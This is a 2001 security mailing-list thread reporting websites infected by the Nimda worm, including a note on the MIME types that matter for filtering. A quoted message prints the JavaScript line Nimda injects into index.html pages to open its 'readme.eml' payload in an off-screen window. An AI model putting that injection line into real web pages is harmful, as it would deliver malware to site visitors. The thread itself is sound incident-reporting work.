Security Incidents mailing list archives
RE: Web site infected by Nimda
From: "John Q. Public" <tpublic () dimensional com>
Date: Wed, 19 Sep 2001 11:25:24 -0600 (MDT)
Interestingly, the content type from www.wininternals.com (aka 207.30.43.69, aka underconstruction.infoback.net) is application/octet-stream. The content type on www.digimind.fr is correct at "message/rfc822." Something to keep in mind if you're setting up filters. .nhoJ On Wed, 19 Sep 2001, Jac Engel wrote: |Date: Wed, 19 Sep 2001 19:07:22 +0200 |From: Jac Engel <jacengel () home nl> |To: "acz [iSecureLabs]" <aurelien.cabezon () iSecureLabs com>, incidents () securityfocus com |Subject: RE: Web site infected by Nimda | |http://www.wininternals.com is also infected by Nimda Virus, |after the page is loaded I get a new page |saying : |You have encountered the following error while using Windows Media Player: |---------------------------------------------------------------------------- |---- |Error# 8007000D |Sorry, no more help is available for this problem at this time. | |Jac | |-----Original Message----- |From: acz [iSecureLabs] [mailto:aurelien.cabezon () iSecureLabs com] |Sent: Sunday, September 19, 1999 5:46 PM |To: incidents () securityfocus com |Subject: Web site infected by Nimda | | |Hi all, | |http://www.digimind.fr/ is infected by Nimda virus ! | |This line was added at the end of the index.html | |---<cut>--- |<html><script language="JavaScript">window.open("readme.eml", null, |"resizable=no,top=6000,left=6000")</script></html> |---<cut>--- | |If you wanna visit digimind.fr, turn your webbrowser javascript off ! | |--- |Cabezon Aurelien |http://www.iSecureLabs.com | | |---------------------------------------------------------------------------- |This list is provided by the SecurityFocus ARIS analyzer service. |For more information on this free incident handling, management |and tracking system please see: http://aris.securityfocus.com | | |---------------------------------------------------------------------------- |This list is provided by the SecurityFocus ARIS analyzer service. |For more information on this free incident handling, management |and tracking system please see: http://aris.securityfocus.com | ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Nimda - collected information Berislav Kucan (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- RE: Web site infected by Nimda Ken Pfeil (Sep 19)
- RE: Web site infected by Nimda John Q. Public (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Nick FitzGerald (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 20)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)